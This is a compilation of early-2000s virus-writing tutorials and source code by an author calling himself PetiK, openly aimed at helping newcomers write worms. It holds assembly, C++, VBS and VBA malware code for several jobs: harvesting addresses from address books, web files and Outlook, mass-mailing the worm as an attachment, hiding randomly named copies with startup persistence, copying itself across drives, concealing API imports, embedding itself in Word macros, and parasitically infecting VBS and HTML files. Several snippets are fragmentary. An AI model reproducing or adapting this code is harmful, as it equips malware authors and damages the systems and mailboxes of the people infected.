"f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w",
"x", "y", "z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "+", "/")
Erase bin
l = 0: i = 0: FileIn = 0: b = 0:
s = ""
FileIn = FreeFile
s = s & vbCrLf
sResult = sResult & s
s = ""
End If
s = s & "="
Else
b = (bin(0) \ 4) And &H3F
s = s & Base64Tab(b)
s = s & "=="
End If
End If
s = ""
Close FileIn
EncodeBase64 = sResult
End Function
comment *
Name : I-Worm.DieWorm
Author : PetiK
Date : July 10th 2002
Language : win32asm
*
.586p
.model flat
.code
JUMPS
include useful.inc
api macro a
extrn a:proc
call a
endm
start:
get_name:
push 50
mov esi,offset orgwrm
push esi
push 0
api GetModuleFileNameA
get_copy_name:
mov edi,offset cpywrm
push edi
push 50
push edi
api GetWindowsDirectoryA
add edi,eax
mov eax,'acs\'
stosd
mov eax,'renn'
stosd
mov eax,'exe.'
stosd
pop edi
copy_worm:
; push 0
; push edi
; push esi
; api CopyFileA
; push 50
; push edi
; push 1
; @pushsz "ScanW32"
; @pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
; push 80000002h
; api SHSetValueA
push 0
push 0
push 3
push 0
push 1
push 80000000h
push offset orgwrm
api CreateFileA
inc eax
je end_worm
dec eax
xchg ebx,eax
push 0
push 0
push 0
push 2
push 0
push ebx
api CreateFileMappingA
test eax,eax
je end_w1
xchg eax,ebp
push 0
push 0
push 0
push 4
push ebp
api MapViewOfFile
test eax,eax
je end_w2
xchg eax,esi
push 0
push ebx
api GetFileSize
mov [size],eax
push 40h
@pushsz "Hello"
@pushsz "Hello"
push 0
api MessageBoxA
push 0
push 80h
push 2
push 0
push 1
push 40000000h
@pushsz "essai.txt"
api CreateFileA
mov [hvba],eax
@start_hex:
mov cnt,0
mov edi,offset dochex
push edi
push 0
push offset byte
push 112
push offset dochex
push [hvba]
api WriteFile
push [hvba]
api CloseHandle
f_hex:
end_w3: push esi
api UnmapViewOfFile
end_w2: push ebp
api CloseHandle
end_w1: push ebx
api CloseHandle
end_worm:
push 0
api ExitProcess
conv_hex:
PUSH ECX
PUSH EDI
@@Y:
INC EDI
DEC CL
JNZ @@Y
DEC EDI
MOV AL, BYTE PTR [EDI]
POP ECX
AND CL, 0Fh
LEA EDI, Tab_Hex
INC CL
@@X:
INC EDI
DEC CL
JNZ @@X
DEC EDI
MOV AH, BYTE PTR [EDI]
POP EDI
POP ECX
RET
.data
orgwrm db 50 dup (0)
cpywrm db 50 dup (0)
dochex db 112 dup (0)
hfile dd ?
hvba dd ?
byte dd 0
size dd ?
cnt dd ?
Tab_Hex db "0123456789ABCDEF", 00h
ends
end start
=== How to spread a worm ? ===
=== by PetiK (09/17/2001) ===
###################
#FIND SOME ADDRESS#
###################
The most difficult to spread a worm is to find some address.
There are in the computer, a lot of file which stock address.
*.WAB file (Windows AddressBook):
---------------------------------
We can find this sort of file in the default value of
HKEY_CURRENT_USER\Software\Microsoft\Wab\WAB4\Wab File Name.
Look at the source of Win32.HiV coded by Benny to examine the mechanism.
For this sort of file, I use an other technic. I create in the C:\
a vbs file. This vbs file will search all email in the Oultook Address Book
and save them in a file in the WINDOWS or SYSTEM folder. This file afterwards
is scanned by the worm (look at the source of I-Worm.Passion or I-Worm.Rush).
#################
#SPREAD THE WORM#
#################
I have imagined something to insert a virus/worm/trojan in a mail which contain already
an attachment. We're going to use *.eml file again
------=_NextPart_001_0009_01C13EF1.BF420560
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
------=_NextPart_000_0008_01C13EF1.BF420560
Content-Type: application/x-msdownload;
name="Winpopup.exe"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="Winpopup.exe" <= This is a first attachment
HGiAAAAAAAaACgAAAAAA5gUNADAcP4AAAAAA8wUFADAcQIAAAAAA+AUzADAcQoAAAAAAKwZpADAc
Q4AAAAAAlAYLADAcRIAAAAAAnwYJADAcvIAAAAAAqAYLADAcFIEAAAAAswYEADAcFYEAAAAAtwYF
ADAcFoEAAAAAvAYDADAcZYAAAAAACYABAAAAAAC/BgMAMAzcgAAAAAAKgAEAAAAAAMIGAQAwHKoB
AAAAABCAAQAAAAAAwwYfADAMAYAAAAAAA4AGAAAAAACMBC8AEBwBgAAAAAC7BBMAEBwCgAAAAADR
There we are !
If you have suggest, please mail me to petikvx@multimania.com.
You can visit my siteweb : http://www.petikvx.fr.fm
=== Some Practice Technics ===
== by PetiK (02/10/2002) ===
###############
#Introduction:#
###############
This article presents some technics that I use for my worm. I don't code
very well like other coderz (Benny, GriYO, Bumblebee ,etc...) but I want
to show what I know to do. Each part will be accompagny of a code source.
Summary: I:Hide a copy of worm
II:Spread a worm into different drives
III:Extract API from KERNEL32.DLL library
########################
#I:Hide a copy of worm:#
########################
When I read a new description of worm, I note that he uses a static name
like services.exe (XTC), winmine.exe (Chainsaw), wsock2.dll (Icecubes).
It's practice because of the name but to delete the worm it's practice too.
So my idea was to change in each start the name of the worm. How ?? Easy.
First: create a random name into %windir% or %sysdir% directory :
push 50
mov esi,offset orig_worm
push esi
push 0
api GetModuleFileNameA
mov edi,offset copy_worm
push edi
push 50
push edi
api GetSystemDirectoryA
add edi,eax
mov al,"\"
stosb
api GetTickCount \ Thanx to Benny for this
push 9 |
pop ecx |
xor edx,edx |
div ecx |
inc edx |
mov ecx,edx |
copy_g: |
push ecx |
api GetTickCount |
push 'z'-'a' |
pop ecx |
xor edx,edx \
div ecx ---- Example of random name:
xchg eax,edx / jwvv.exe, abgqlbg.exe, slb.exe
add al,'a' |
stosb |
api GetTickCount |
push 100 |
pop ecx |
xor edx,edx |
div ecx |
push edx |
api Sleep | If we don't sleep the name look like:
pop ecx | ggggggg.exe, hhhhhhhh.exe uuuuuuu.exe
loop copy_g |
mov eax,"exe." |
stosd |
pop edi /
Second: Put the original name into Wininit.ini to delete him in the next start:
@pushsz "C:\WINDOWS\WININIT.INI" \
push offset orig_name | [rename]
@pushsz "NUL" >--- NUL=orig_name
@pushsz "rename" |
api WritePrivateProfileStringA /
Third: Copy of the worm:
push 0
push edi ; copy name
push esi ; original name
api CopyFileA
Fourth: Register the name into Win.ini to active him in the next start:
push edi ; copy name
@pushsz "RUN"
@pushsz "WINDOWS"
api WriteProfileStringA
-----------------------source-----------------------
.586p
.model flat
.code
JUMPS
api macro a
extrn a:proc
call a
endm
include Useful.inc
start_worm:
push 50
mov esi,offset orig_worm
push esi
push 0
api GetModuleFileNameA
mov edi,offset copy_worm
push edi
push 50
push edi
api GetSystemDirectoryA
add edi,eax
mov al,"\"
stosb
api GetTickCount
push 9
pop ecx
xor edx,edx
div ecx
inc edx
mov ecx,edx
copy_g:
push ecx
api GetTickCount
push 'z'-'a'
pop ecx
xor edx,edx
div ecx
xchg eax,edx
add al,'a'
stosb
api GetTickCount
push 100
pop ecx
xor edx,edx
div ecx
push edx
api Sleep
pop ecx
loop copy_g
mov eax,"exe."
stosd
pop edi
push 40h
push offset copy_worm
push edi
push 0
api MessageBoxA
push 50
push offset wininit
api GetWindowsDirectoryA
@pushsz "\WININIT.INI"
push offset wininit
api lstrcat
push offset wininit
push esi
@pushsz "NUL"
@pushsz "rename"
api WritePrivateProfileStringA
copy_w: push 0
push edi
push esi
api CopyFileA
run_w: push edi
@pushsz "RUN"
@pushsz "WINDOWS"
api WriteProfileStringA
end_worm:
push 0
api ExitProcess
.data
copy_worm db 50 dup (0)
orig_worm db 50 dup (0)
wininit db 50 dup (0)
end start_worm
end
-----------------------source-----------------------
########################################
#II:Spread a worm into different drives#
########################################
One copy good is, many copies better are. In fact, we can create a sort of "backup"
of the worm into different drives of the system.
It's easy to code this (too easy perhaps).
start_worm:
push 50
mov esi,offset orig_worm ; Take the name of the worm
push esi
push 0
api GetModuleFileNameA
spread_system:
call @lect
db "D:\",0 ; The differents drives. We don't
db "E:\",0 ; use A,B because it's certainly
...... ; floopy drive.
db "Y:\",0
db "Z:\",0
@lect:
pop esi
push 23 ; Number of drives 26-3=23
pop ecx
loop_lect:
push ecx
push esi
api SetCurrentDirectoryA
; test eax,eax
; jnz continue_spread
push 0
@pushsz "winbackup.exe" ; name of copy
push offset orig_worm
api CopyFileA
;continue_spread:
@endsz
pop ecx
loop loop_lect
end_spread_system:
-----------------------source-----------------------
.586p
.model flat
.code
JUMPS
api macro a
extrn a:proc
call a
endm
include Useful.inc
start_worm:
push 50
mov esi,offset orig_worm
push esi
push 0
api GetModuleFileNameA
spread_system:
call @lect
db "D:\",0
db "E:\",0
db "F:\",0
db "G:\",0
db "H:\",0
db "I:\",0
db "J:\",0
db "K:\",0
db "L:\",0
db "M:\",0
db "N:\",0
db "O:\",0
db "P:\",0
db "Q:\",0
db "R:\",0
db "S:\",0
db "T:\",0
db "U:\",0
db "V:\",0
db "W:\",0
db "X:\",0
db "Y:\",0
db "Z:\",0
@lect:
pop esi
push 23
pop ecx
loop_lect:
push ecx
push esi
api SetCurrentDirectoryA
push 0
@pushsz "winbackup.exe"
push offset orig_worm
api CopyFileA
@endsz
pop ecx
loop loop_lect
end_spread_system:
end_worm:
push 0
api ExitProcess
.data
orig_worm db 50 dup (0)
lect db 50 dup (0)
end start_worm
end
-----------------------source-----------------------
###########################################
#III:Extract API from KERNEL32.DLL library#
###########################################
A lot of disassembler/debugger (like W32DASM) can find the APIs used by a program.
And a worm/virs/trojan is a program.
With normal program : "extrn API:proc" Import functions of W32DASM show
KERNEL32.CloseHandle
KERNEL32.CreateFileA
KERNEL32.GetModuleHandleA
KERNEL32.GetProcAddress
KERNEL32.WriteFile
A user who debug the program can to doubt that the program Create or open a file to write
something. We can hide KERNEL32.CloseHandle
KERNEL32.CreateFileA and
KERNEL32.WriteFile.
How ?? While exctracting APIs from KERNEL32.DLL
code section
------------
First: Open KERNEL32.DLL:
@pushsz "KERNEL32.DLL"
api GetModuleHandleA
xchg eax,ebx
Second: Use a macro to take the address of APIs:
kern macro x
push offset sz&x
push ebx
api GetProcAddress
mov _ptk&x,eax
endm
Third: Extract the different APIs:
kern CloseHandle
kern CreateFileA
kern WriteFile
api macro a
extrn a:proc
call a
endm
include Useful.inc
start_worm:
@pushsz "KERNEL32.DLL"
api GetModuleHandleA
xchg eax,ebx
kern macro x
push offset sz&x
push ebx
api GetProcAddress
mov _ptk&x,eax
endm
kern CloseHandle
kern CreateFileA
kern WriteFile
prep_spread_worm:
push 0
push 80h
push 2
push 0
push 1
push 40000000h
@pushsz "C:\KernApi.txt"
call _ptkCreateFileA
xchg eax,ebx
push 0
push offset octets
push e_txt - s_txt
push offset s_txt
push ebx
call _ptkWriteFile
push ebx
call _ptkCloseHandle
.data
octets dd ?
szCloseHandle db "CloseHandle",0
szCreateFileA db "CreateFileA",0
szWriteFile db "WriteFile",0
_ptkCloseHandle dd ?
_ptkCreateFileA dd ?
_ptkWriteFile dd ?
s_txt: db 'Text file create with',CRLF
db 'APIs extract from',CRLF
db 'KERNEL32.DLL library',CRLF,CRLF
db 9,'PetiK',CRLF
e_txt:
end start_worm
end
-----------------------source-----------------------
#############
#Conclusion:#
#############
################
# Introducion: #
################
I wrote this article after programming VBS.Xchange and VBS.Doublet (two VBS/DOC infectors).
There are three parts in this article.
- Hex Conversion : How convert a ascii file (VBS in a module of Word for example).
- Spread with "mailto:" : spread a VBS worm with web files.
- Random Name Generator : To change in each start a new copy of a VBS worm/virii.
I succeeded to code without look at other source
This sort of aticle is of course not for good coderz but for the newbies (NOT LAMERZ) and
all people who want learn about WORM programming.
###################
# HEX CONVERSION: #
###################
Why convert a file in hexadecimal ?? For example to put it in module of a Word dosument.
How to do this ??
1) Set fso=CreateObject("Scripting.FileSystemObject")
Set fl=fso.OpenTextFile(WScript.ScriptFullname,1)
virus=fl.ReadAll ' Read all the file
fl.Close
2) For i=1 To len(virus) ' Take the size of the file
3) e=Mid(virus,i,1) ' Take one byte after one.
e=Hex(Asc(e)) ' And convert in hexa. (P=50;e=65;...)
4) If Len(e)=1 Then ' If the hexa < 10h we add a 0
e="0"&e ' Example : return (0Dh0Ah). We will have D and A.
End If ' So we add a 0 => 0D and 0A
5) f=f+e ' This part is for the lenght of the line in the module
If Len(f)=110 Then ' of the document (don't support too long).
sp.WriteLine "e = e + """+f+"""" ' Here we put 110 character:
f="" ' e = e + "...110 char..."
End If
6) If Len(virus)-i = 0 Then ' Here is for the last line if there are less 110 char :
sp.WriteLine "e = e + """+f+"""" ' e = e + "... 1 < number of char < 110..."
f=""
End If
So the code source :
*******************************************************************************************************************
*****
On Error Resume Next
Set fso=CreateObject("Scripting.FileSystemObject")
Set fl=fso.OpenTextFile(WScript.ScriptFullname,1)
virus=fl.ReadAll
fl.Close
set sp=fso.CreateTextFile("example_vbshex.txt",True,8)
sp.WriteLine "Attribute VB_Name = ""VirModule"""
sp.WriteLine "Sub AutoOpen()"
sp.WriteLine "On Error Resume Next"
sp.WriteLine "e = """""
For i=1 To len(virus)
e=Mid(virus,i,1)
e=Hex(Asc(e))
If Len(e)=1 Then
e="0"&e
End If
f=f+e
If Len(f)=110 Then
sp.WriteLine "e = e + """+f+""""
f=""
End If
If Len(virus)-i = 0 Then
sp.WriteLine "e = e + """+f+""""
f=""
End If
Next
sp.WriteLine "read=dec(e)"
sp.WriteLine "Open ""C:\newvbsfile.vbs"" For Output As #1"
sp.WriteLine "Print #1, read"
sp.WriteLine "Close #1"
sp.WriteLine "Shell ""wscript C:\newvbsfile.vbs"""
sp.WriteLine "End Sub"
sp.WriteLine ""
sp.WriteLine "Function dec(octe)"
sp.WriteLine "For hexad = 1 To Len(octe) Step 2"
sp.WriteLine "dec = dec & Chr(""&h"" & Mid(octe, hexad, 2))"
sp.WriteLine "Next"
sp.WriteLine "End Function"
sp.Close
*******************************************************************************************************************
*****
#########################
# SPREAD WITH "MAILTO:" #
#########################
Now we are going to see how spread a VBS worm without the Windows AddressBook (aka WAB).
If we can't use the WAB, we can read old mail and take the EMail. But too bad, I don't code this
in VBS. Last solution : take the EMail in the WEB file (htm, html, asp, etc...).
1) if (ext="htm") or (ext="html") or (ext="htt") or (ext="asp") Then ' Take the good extension
' htm, html, asp, doc, xls
set htm=fso.OpenTextFile(fil.path,1) ' and open the file.
verif=True
allhtm=htm.ReadAll() ' Read all the file.
htm.Close
Sub spreadmailto(dir)
On Error Resume Next
Set fso=CreateObject("Scripting.FileSystemObject")
Set f=fso.GetFolder(dir)
Set cf=f.Files
For Each fil in cf
ext=fso.GetExtensionName(fil.path)
ext=lcase(ext)
if (ext="htm") or (ext="html") or (ext="htt") or (ext="asp") Then
set htm=fso.OpenTextFile(fil.path,1)
allhtm=htm.ReadAll()
htm.Close
For ml=1 To Len(allhtm)
count=0
If Mid(allhtm,ml,7) = "mailto:" Then
counter=counter+1
mlto=""
Do While Mid(allhtm,ml+6+count,1) <> """"
count=count+1
mlto = mlto + Mid(allhtm,ml+6+count,1)
loop
mel.WriteLine counter &" <"&left(mlto,len(mlto)-1)&">"
msgbox mlto
sendmailto(left(mlto,len(mlto)-1))
End If
Next
End If
Next
End Sub
Sub list(dir)
On Error Resume Next
Set f=fso.GetFolder(dir)
Set ssf=f.SubFolders
For Each fil in ssf
spreadmailto(fil.path)
list(fil.path)
Next
End Sub
Sub sendmailto(email)
Set out=CreateObject("Outlook.Application")
Set mailmelto=out.CreateItem(0)
mailmelto.To email
mailmelto.Subject "Subject of worm"
mailmelto.Body "Body of worm"
mailmelto.Attachment.Add (WScript.ScriptFullName)
mailmelto.DeleteAfterSubmit = True
mailmelto.Send
Set out = Nothing
End Sub
*******************************************************************************************************************
*****
In the spread_mailto.txt file we have this:
*******************************************************************************************************************
*****
1 <Petikvx@aol.com>
2 <VBS.Ketip.A@mm>
3 <PetiK@aol.com>
4 <kavdaemon@relay.avp.ru>
5 <kavdaemon@relay.avp.ru>kavdaemon@relay.avp.ru</A></TD></TR>
<TR class=aolmailheader>
<TD noWrap vAlign=top width=>
6 <Pentasm99@aol.com>
7 <Pentasm99@aol.com screenname=>
...
...
*******************************************************************************************************************
*****
##########################
# RANDOM NAME GENERATOR: #
##########################
Like I said in my last article about "Hide a copy a of worm" we are going to make the same thing in VBS.
1) tmpname="" ' Value of tmpname is NULL
2) randomize(timer) ' Random size of the first part of name
namel=int(rnd(1)*20)+1 ' between 1 and 20.
3) For lettre = 1 To namel ' Put the letter.
randomize(timer) ' 97 : Start from "a" (65 : Start from "A")
tmpname=tmpname & chr(int(rnd(1)*26)+97) ' 26 : from "a-A" to "z-Z"
Next ' for number 26 => 9 and 97 => 48
4) typext = "execombatbmpjpggifdocxlsppthtmhtthta" ' Now we choice an extension between 12 differents.
randomize(timer)
tmpext = int(rnd(1)*11)+1
5) tmpname=tmpname & "." & mid(typext,((tmpext-1)*3)+1,3) & ".vbs" ' And we have the result
Code Source:
*******************************************************************************************************************
*****
tmpname=""
randomize(timer)
namel=int(rnd(1)*20)+1
For lettre = 1 To namel
randomize(timer)
tmpname=tmpname & chr(int(rnd(1)*26)+97)
Next
typext = "execombatbmpjpggifdocxlsppthtmhtthta"
randomize(timer)
tmpext = int(rnd(1)*11)+1
tmpname=tmpname & "." & mid(typext,((tmpext-1)*3)+1,3) & ".vbs"
MsgBox tmpname
*******************************************************************************************************************
*****
Some Examples:
mhrmhoulleyl.htm.vbs
rlvqmtyppjcbho.bat.vbs
PREYXUDBNYKNLRSALL.DOC.VBS
869768177527247364.gif.vbs
...
...
This technics is extra to change name of worms copy ineach start (look at my last article)
###############
# CONCLUSION: #
###############
This is the end of the article. I hope that it help you in your creations and research.
If you have any suggestions or comments, please mail me to petikvx@aol.com
PetiK (www.petikvx.fr.fm)
=== Three ways of spread ===
=== by PetiK (05/20/2002) ===
################
# Introducion: #
################
I present in this article the tree mains ways that I use to spread my worms.
##############
# Read Mail: #
##############
I use this first way to code a worm in C++. It is a simple syntax. For this we use
MAPI function : FindNext, ReadMail, SendMail and FreeBuffer
hMAPI=LoadLibrary("MAPI32.DLL");
(FARPROC &)mSendMail=GetProcAddress(hMAPI, "MAPISendMail");
(FARPROC &)mLogon=GetProcAddress(hMAPI, "MAPILogon");
(FARPROC &)mLogoff=GetProcAddress(hMAPI, "MAPILogoff");
(FARPROC &)mFindNext=GetProcAddress(hMAPI, "MAPIFindNext");
(FARPROC &)mReadMail=GetProcAddress(hMAPI, "MAPIReadMail");
(FARPROC &)mFreeBuffer=GetProcAddress(hMAPI, "MAPIFreeBuffer");
And at the end the syntax to read the mail, take email and send the mail :
// Initialize MAPI
mLogon(NULL,NULL,NULL,MAPI_NEW_SESSION,NULL,&session);
// Here we take the "name" and the "email" of the guy who send the mail
strcpy(mname,mes->lpOriginator->lpszName);
strcpy(maddr,mes->lpOriginator->lpszAddress);
mes->ulReserved=0;
mes->lpszSubject="Subject of worm";
mes->lpszNoteText="Body of Worm.";
mes->lpszMessageType=NULL;
mes->lpszDateReceived=NULL;
mes->lpszConversationID=NULL;
mes->flFlags=MAPI_SENT;
mes->lpOriginator->ulReserved=0;
mes->lpOriginator->ulRecipClass=MAPI_ORIG;
mes->lpOriginator->lpszName=mes->lpRecips->lpszName;
mes->lpOriginator->lpszAddress=mes->lpRecips->lpszAddress;
mes->nRecipCount=1;
mes->lpRecips->ulReserved=0;
mes->lpRecips->ulRecipClass=MAPI_TO;
// Close MAPI
mLogoff(session,0,0,0);
FreeLibrary(hMAPI);
}
I you can use this function in VBS (or VB), very good (and mail me).
************************************************************************************************
#####################
# "mailto:" string: #
#####################
{Win32Asm}
call CreateFileA
inc eax
je END_S
dec eax
xchg eax,ebx
push PAGE_READONLY
push 0
push ebx
call CreateFileMappingA
test eax,eax
jz FERME1
3rd:
push FILE_MAP_READ
push ebp
call MapViewOfFile
test eax,eax
jz FERME2
xchg eax,esi
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
{C++}
First : FindFile
hFile=FindFirstFile(ext,&ffile); //
if(hFile!=INVALID_HANDLE_VALUE) { //
while(abc) { //
GetMail(ffile.cFileName,mail); //
if(strlen(mail)>0) { // NO COMMENTS !
sendmail(mail); //
} //
abc=FindNextFile(hFile,&ffile); //
} //
} //
hf=CreateFile(namefile,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,0);
if(hf==INVALID_HANDLE_VALUE)
return; // Like in Win32Asm :
size=GetFileSize(hf,NULL); // Open File
if(!size)
return; // Empty ?? Close it
size-=100;
hf2=CreateFileMapping(hf,0,PAGE_READONLY,0,0,0);
if(!hf2) {
CloseHandle(hf); // Map the file
return;
}
mapped=(char *)MapViewOfFile(hf2,FILE_MAP_READ,0,0,0);
if(!mapped) {
CloseHandle(hf2);
CloseHandle(hf);
return;
}
i=0;
while(i<size && !test) {
if(!strncmpi("mailto:",mapped+i,strlen("mailto:"))) { // If "mailto:" string exists ??
test=TRUE;
i+=strlen("mailto:");
k=0;
while(mapped[i]!=34 && mapped[i]!=39 && i<size && k<127) { // Until " or ' charachter
if(mapped[i]!=' ') {
mail[k]=mapped[i];
k++;
if(mapped[i]=='@') // Check @ charachter
valid=TRUE;
}
i++;
}
mail[k]=0; // and stock email in mail offset
} else
i++;
}
if(!valid)
mail[0]=0;
UnmapViewOfFile(mapped);
CloseHandle(hf2);
CloseHandle(hf);
return;
}
from.lpszName=NULL;
from.ulRecipClass=MAPI_ORIG;
mess.lpszSubject="Subject of mail";
mess.lpszNoteText="Body of mail";
mess.lpRecips=(MapiRecipDesc *)malloc(sizeof(MapiRecipDesc));
if(!mess.lpRecips)
return;
memset(mess.lpRecips,0,sizeof(MapiRecipDesc));
mess.lpRecips->lpszName=tos; // Here the mail that we found
mess.lpRecips->lpszAddress=tos;
mess.lpRecips->ulRecipClass=MAPI_TO;
mess.nRecipCount=1;
mess.lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc));
if(!mess.lpFiles)
return;
memset(mess.lpFiles,0,sizeof(MapiFileDesc));
mess.lpFiles->lpszPathName="FullName_of_the_worm.exe";
mess.lpFiles->lpszFileName="othername_of_worm.exe";
mess.nFileCount=1;
mess.lpOriginator=&from;
free(mess.lpRecips);
free(mess.lpFiles);
}
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
{VBS}
************************************************************************************************
########################
# Outlook Address Book #
########################
{Win32Asm}
In the virus/worm Win32.HiV, Benny scans the default WAB file to spread.
But it was a little difficult for me. Then I coded differently.
srch_wab:
mov edi,offset wab_path
push offset wab_size ; = fullname of WAB file
push edi
push offset reg
push 0
@pushsz "Software\Microsoft\Wab\WAB4\Wab File Name" ; The name of WAB file
push 80000001h
api SHGetValueA
To open and map file, like for the HTM and HTML file (see on top).
Now, scan the file:
d_scan_mail:
call @smtp
db 'SMTP',00h,1Eh,10h,56h,3Ah ; the string what we want to find
@smtp:
pop edi
s_scan_mail:
pushad
push 9
pop ecx
rep cmpsb
popad
je scan_mail
inc esi
loop s_scan_mail
....
scan_mail:
xor edx,edx
add esi,21
mov edi,offset mail_addr
push edi ; EDI = EMail
p_c: lodsb
cmp al," "
je car_s
cmp al,00h
je f_mail
cmp al,"@"
jne not_a
inc edx
not_a: stosb
jmp p_c
car_s: inc esi
jmp p_c
f_mail: xor al,al
stosb
pop edi
test edx,edx
je d_scan_mail
call send_mail
jmp d_scan_mail
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
{VBA}
I took the code from W97M.Melissa.A:
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
{VBS}
I took the code from VBS.StarMania:
Set O=CreateObject("Outlook.Application")
Set mapi=O.GetNameSpace("MAPI")
For Each AL In mapi.AddressLists
If AL.AddressEntries.Count <> 0 Then
For AddListCount = 1 To AL.AddressEntries.Count
Set ALE = AL.AddressEntries(AddListCount)
Set go = O.CreateItem(0)
go.To = ALE.Address
go.Subject = "GUESS"
go.Body = "GUESS"
go.Attachments.Add(WScript.ScriptFullName)
go.DeleteAfterSubmit = True
go.Send
************************************************************************************************
###############
# Conclusion: #
###############
PetiK (www.petikvx.fr.fm)
=== What language for which work ?? ===
=== by PetiK (06/02/2002) ===
################
# Introducion: #
################
Often new coders (like newbies) ask oneself what is the best language to code
virus - worms. So I try to present the different languages that I use to code
my works. First I present the compile languages (Win32Asm - C/C++ - VB) and
second the script language.
################
# 1) Win32asm: # THE BEST
################
It's by far the best way to code virus/worms. You can all control with this.
This language is useful for a good infection. Today, 98 % of virii are coded
in assembler. There are different ways to spread worms too.
First the MAPI functions. Look at my works (and others) to see the syntax.
Other way : SMTP. It's a good device to deceive the victims. They can believe
that an email come from a company (support@microsoft.com) or himself. But it
is a difficult language in the biginning. See, read and learn tutorials and
other viriis/worms' source.
#############
# 2) C/C++: #
#############
I learnt this language 6 months ago. Advantage, the syntax is as easy as ASM.
It's especially a language to code worms thanks to <mapi.h>.
You can spread you work by reading old mails or scan some WEB files but also
by coding a SMTP processus.
This language is equally use to code worms that use IIS server to spread like
the worm : W32.Nimda.Worm.
With this language, you can code virii/worms' linux too.
##########
# 3) VB: #
##########
Of course it's a lame language. But you can use the Outlook's Address Book to
spread your work without effort. But this sort of program are fast detected
by AV (Norton : Bloodhound.W32.VBWORM).
Personnaly, I use this language to code some tools like Virii/Worms Generator
or other things.
###########
# 4) VBS: #
###########
############
# 5) HTML: #
############
With this language, the most interesting are the virii. Of course you code in
VBS language (or in JavaScript). This is the same syntax. Try to find a new
sort of spreading.
###########
# 6) VBA: #
###########
If you know the VBS language, you don't will have problemz to code a macro
virus (DOC / XLS). To code macro virii is easiest thing in the VX life. So
you must find novelties (new way to infect DOC files, infect DOC/XLS files
or spread throught DOC/EXE files, etc...). Spread is easy too : Melissa.A.
###############
# Conclusion: #
###############
PetiK (www.petikvx.fr.fm)
=== VBS/HTML multi-infection ===
=== by PetiK (06/19/2002) ====
################
# Introducion: #
################
This article present how to travel between VBS and HTML file to infect them.
There are 4 chapters : I: VBS -> VBS
II: VBS -> HTML
III: HTML-> HTML
IV: HTML-> VBS
#################
# I: VBS -> VBS #
#################
We can frequently see this in the VBS virus. There are two sort of infection:
-Overwritting : % To bad, the user sees immediatly the problem
% Crash the VBS file
So this solution is not very good.
-Parasit : % Start of the file :
**********************
* 'mark of the virus *
* *
* + *
* *
* VBS virus *
**********************
* *
* Real VBS prog *
* *
**********************
% End of the file :
**********************
* 'mark of the virus *
**********************
* *
* Real VBS prog *
* *
**********************
* *
* VBS virus *
* *
**********************
So we're going to see the code :
'mark
On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
Set ws = CreateObject("WScript.Shell")
Set fl = fso.OpenTextFile(WScript.ScriptFullName, 1)
virus = fl.ReadAll ' Stock the virus code
fl.Close
infectfile()
Sub infectfile()
On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
Set drv = fso.Drives
For Each d In drv ' Get the drive
If d.DriveType = 2 Or d.DriveType = 3 Then
list(d.path&"\")
End If
Next
End Sub
Sub list(doss)
On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
Set fold = fso.GetFolder(doss)
Set yebjp = fold.SubFolders
For Each f1 In yebjp ' Get the folder
infect(f1.Path)
list(f1.Path)
Next
End Sub
Sub infect(doss)
On Error Resume Next
Set zqhanx = CreateObject("Scripting.FileSystemObject")
Set lxxj = zqhanx.GetFolder(doss)
Set fc = lxxj.Files
For Each f1 In fc ' Get the files
ext = fso.GetExtensionName(f1.Path)
ext = lCase(ext)
If (ext = "vbs") Then
Set cot = fso.OpenTextFile(f1.Path, 1, False)
If cot.ReadLine <> "'mark" Then ' check is already infected
cot.Close
Set cot = fso.OpenTextFile(f1.Path, 1, False)
vbsorg = cot.ReadAll()
cot.Close
Set inf = fso.OpenTextFile(f1.Path, 2, True)
inf.WriteLine virus ' write virus code
inf.WriteLine ""
inf.WriteLine (vbsorg) ' write real code
inf.Close
End If
End If
Next
End Sub
###################
# II: VBS -> HTML #
###################
So, the idea is to put the viral code into the VBS file. How ?? by converting into hex string :
....
....
If (ext = "htm") or (ext = "html") Then
Set cot = fso.OpenTextFile(f1.Path, 1, False)
If InStr(1,cot.ReadAll(),"vbshex") = 0 Then ' check is already infected
cot.Close
Set htmf = fso.OpenTextFile(f1.Path, 8, False)
htmf.WriteLine "<SCRIPT LANGUAGE=VBSCRIPT>"
f = "vbshex="""
For i = 1 to Len(virus) ' take all char
e=Mid(virus,i,1)
e=Hex(Asc(e)) ' and convert in hex
If Len(e)=1 Then
e="0"&e 'DA -> 0D0A for VbCrLf
End If
f=f+e
Next
f=f+""""
...... NO FINISH, SEE THE fourth chapter ' Here the infection HTML -> VBS
htmf.WriteLine f
htmf.Close
End If
End If
Set htmf = fso.CreateTextFile("hello.htm",8,-2)
htmf.WriteLine "<SCRIPT LANGUAGE=VBSCRIPT>"
f = "vbshex="""
For i = 1 to Len(virus)
e=Mid(virus,i,1)
e=Hex(Asc(e))
If Len(e)=1 Then
e="0"&e
End If
f=f+e
Next
f=f+""""
htmf.WriteLine f
htmf.Close
#####################
# III: HTML -> HTML #
#####################
It's a simple routine. Like in VBS (and it's in VBS).
End If
Next
End If
End Function
</script></body></html>
really simple no ??
###################
# IV: VBS -> HTML #
###################
So this is the the last part.
Look at the second part, I write
...... NO FINISH, SEE THE fourth chapter ' Here the infection HTML -> VBS
We must search here the VBS file. The same way that we infect HTM/HTML file.
In the HTML virus we have :
If ext="htm" or ext="html" Then
So we add
ElseIf ext="vbs" Then
Set cot = fso.OpenTextFile(f1.Path, 1, False)
If cot.ReadLine <> "'mark" Then ' check is already infected
cot.Close
Set cot = fso.OpenTextFile(f1.Path, 1, False)
